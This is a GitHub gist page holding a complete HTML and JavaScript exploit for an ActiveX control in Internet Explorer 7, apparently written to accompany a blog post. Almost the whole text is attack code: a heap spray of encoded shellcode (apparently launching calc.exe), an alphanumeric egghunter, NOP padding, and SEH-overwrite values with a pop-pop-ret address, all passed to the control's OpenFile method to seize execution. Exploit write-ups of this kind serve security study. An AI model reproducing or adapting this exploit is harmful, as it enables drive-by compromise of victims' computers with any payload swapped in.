Skip to content

Instantly share code, notes, and snippets.

@0x09AL
Created July 6, 2017 13:12
Show Gist options
  • Save 0x09AL/b481ce56aefd97320a8e4421f565ca03 to your computer and use it in GitHub Desktop.
Save 0x09AL/b481ce56aefd97320a8e4421f565ca03 to your computer and use it in GitHub Desktop.
Internet Explorer 7 RSP Exploit for blogpost
<!DOCTYPE html>
<html>
<head>
<title> Exploit for IE 7 </title>
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
</head>
<body>
<script type="text/javascript">
function allocateShellcode(){
var eggTag = "%u3077%u7430";
var msfShellcode = "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100";
var shellcode = unescape(eggTag + eggTag + msfShellcode)
var myArray = [];
for (x = 0; x < 500; x++){
myArray[x] = shellcode;
}
}
var crash = "";
junk_size = 644;
size = 1000;
var eggHunter = unescape(
"%54%5a%d9%eb%d9%72%f4%5f%57%59%49%49%49%49%49" +
"%49%49%49%49%49%43%43%43%43%43%43%37%51%5a%6a" +
"%41%58%50%30%41%30%41%6b%41%41%51%32%41%42%32" +
"%42%42%30%42%42%41%42%58%50%38%41%42%75%4a%49" +
"%62%46%4e%61%6b%7a%6b%4f%64%4f%30%42%32%72%43" +
"%5a%44%42%42%78%68%4d%56%4e%37%4c%57%75%61%4a" +
"%44%34%78%6f%48%38%74%37%74%70%34%70%72%54%6f" +
"%79%5a%77%6e%4f%53%45%6a%4a%6e%4f%61%65%4a%47" +
"%69%6f%68%67%41%41"
);
for(x=0;x<junk_size-eggHunter.length;x++){
crash += unescape("%90");
}
crash += eggHunter;
nSEH = '%90%90%EB%07'; // JMP SHORT
SEH = '%35%60%6D%74'; // 746D6035 pop pop ret address
jmpBack = '%E9%37%FF%FF%FF'; // JMP Back to the egghunter
crash += unescape(nSEH);
crash += unescape(SEH);
for(x=0;x<10;x++){
crash += unescape("%90");//Print 10 NOPs
}
crash += unescape(jmpBack);
for(x=0;x<size - junk_size - 4 - 4 - jmpBack.length - 10;x++){
crash += unescape("%44");
}
allocateShellcode();
VULNERABLE.OpenFile(crash);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment